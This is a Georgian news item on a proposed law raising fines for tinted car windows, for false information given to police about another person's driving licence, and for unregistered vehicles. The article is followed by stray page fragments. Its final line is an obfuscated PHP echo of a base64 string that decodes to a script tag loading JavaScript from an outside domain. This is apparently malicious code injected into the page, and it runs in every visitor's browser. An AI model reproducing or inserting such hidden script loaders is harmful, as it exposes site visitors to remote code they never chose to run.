celsiusi
ავერსი შნაიდერი
შინაგან საქმეთა სამინისტრო ახალი საკანონმდებლო ინიციატივით გამოდის, რომლის გათვალისწინებით, დადგენილი წესის დარღვევით დამუქებული მინების ან შეზღუდული შუქგამტარობის მქონე სატრანსპორტო საშუალების მართვისთვის 500-ლარიანი ჯარიმა იქნება გათვალისწინებული.
 
საკანონმდებლო ცვლილებების ინიცირება 5 სექტემბრის ბიუროს სხდომაზე მოხდება. კანონპროექტით, იზრდება ჯარიმა აღნიშნული ქმედების განმეორებით ჩადენისთვის, რომლისთვისაც სანქციის ოდენობა იქნება – 1 000 ლარი.
 
ამასთან, პროექტით კონკრეტდება, რომ აღნიშნული ქმედების მესამე და ყოველი მომდევნო განმეორება, რომელიც ითვალისწინებდა 300 ლარის ოდენობით ჯარიმის გადახდას, აღარ იქნება გათვალისწინებული და აღნიშნულისთვისაც სანქცია – 1 000 ლარის ოდენობის ჯარიმა იქნება.
 
ზემოთ აღნიშნულის გარდა, სანქცია წესდება მძღოლის მიერ სხვისი მართვის უფლებით სარგებლობის მიზნით პოლიციის უფლებამოსილი პირისათვის ცრუ ინფორმაციის მიწოდებისთვის, რომელიც გამოიწვევს დაჯარიმებას – 700 ლარის ოდენობით. ასევე ცვლილებებით, 250 ლარიდან 300 ლარამდე იზრდება ჯარიმა არარეგისტრირებული სატრანსპორტო საშუალების მართვისთვის.
513
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");